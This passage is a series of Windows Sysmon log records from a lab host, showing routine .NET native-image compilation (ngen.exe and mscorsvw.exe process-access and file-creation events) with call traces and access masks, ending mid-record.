{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.491\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-001027F70E00}\r\nTargetProcessId: 3716\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.491","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-001027F70E00}","TargetProcessId":"3716","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.522\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-001057FA0E00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.522","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-001057FA0E00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.522\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-001057FA0E00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.522","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-001057FA0E00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.522\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-001057FA0E00}\r\nTargetProcessId: 2972\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.522","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-001057FA0E00}","TargetProcessId":"2972","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7768,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:32.600\r\nProcessGuid: {41C8662E-2288-5F25-0000-001057FA0E00}\r\nProcessId: 2972\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b9c-0\\System.Device.dll\r\nCreationUtcTime: 2020-08-01 08:06:32.600","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:32.600","ProcessGuid":"{41C8662E-2288-5F25-0000-001057FA0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\b9c-0\\System.Device.dll","CreationUtcTime":"2020-08-01 08:06:32.600","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7769,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.631\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-00109DFD0E00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.631","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-00109DFD0E00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7770,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.631\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-00109DFD0E00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.631","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-00109DFD0E00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7771,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.647\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-00109DFD0E00}\r\nTargetProcessId: 3672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:32.647","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2288-5F25-0000-00109DFD0E00}","TargetProcessId":"3672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7772,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:32.694\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2288-5F25-0000-0010F6000F00}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 